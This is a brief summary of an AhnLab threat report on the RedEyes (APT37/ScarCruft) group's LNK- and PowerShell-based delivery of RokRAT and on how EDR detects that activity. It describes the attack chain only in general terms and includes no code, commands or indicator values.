AhnLab reported follow-on EDR tracking for RedEyes, also known as APT37 or ScarCruft, after the group distributed CHM malware disguised as security mail from a domestic financial company. The source describes malicious LNK files that contain PowerShell commands, create script files alongside legitimate files under a temp path, and run a decoy PDF so the victim is less likely to notice infection. AhnLab says its EDR can expose the suspicious PowerShell and batch-file execution chain, identify the affected host and logged-in user, and recover additional malware download URLs. The report links the activity to RokRAT distribution and provides LNK and BAT hashes plus OneDrive API download URLs as indicators.